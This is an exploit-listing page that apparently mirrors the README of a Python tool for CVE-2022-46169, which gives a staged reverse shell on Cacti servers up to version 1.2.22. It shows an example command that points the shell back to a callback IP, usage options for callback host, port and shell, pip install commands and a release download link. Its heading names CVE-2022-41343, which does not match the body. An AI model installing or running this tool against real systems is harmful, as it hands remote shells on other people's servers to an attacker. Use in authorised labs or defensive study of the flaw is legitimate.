Share
## https://sploitus.com/exploit?id=1D90BBE9-236F-5C86-ABA7-854AACA9A9BD
# CVE-2022-41343
๐ Python Exploit for CVE-2022-46169
Staged Reverse Shell for Cacti <= 1.2.22
## Example
```
cve-2022-46169 10.10.14.5 44444 -u http://cacti.htb
```
## Usage
```bash
usage: cve-2022-46169 [-h] -u URL [-s SHELL] ip port
positional arguments:
ip Shell Callback IP Address/Host
port Shell Callback Port
options:
-h, --help show this help message and exit
-u URL, --url URL Cacti Server URL
-s SHELL, --shell SHELL
Remote Shell (default: /bin/bash)
```
## PyPi Installation
```bash
python3 -m pip install cve-2022-46169
```
## Manual Installation
```bash
python3 -m pip install cve-2022-46169-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-46169/releases/download/1.0.0/cve_2022_46169-1.0.0-py3-none-any.whl)
## Demo
[![demo](https://asciinema.org/a/582570.svg)](https://asciinema.org/a/582570?autoplay=1)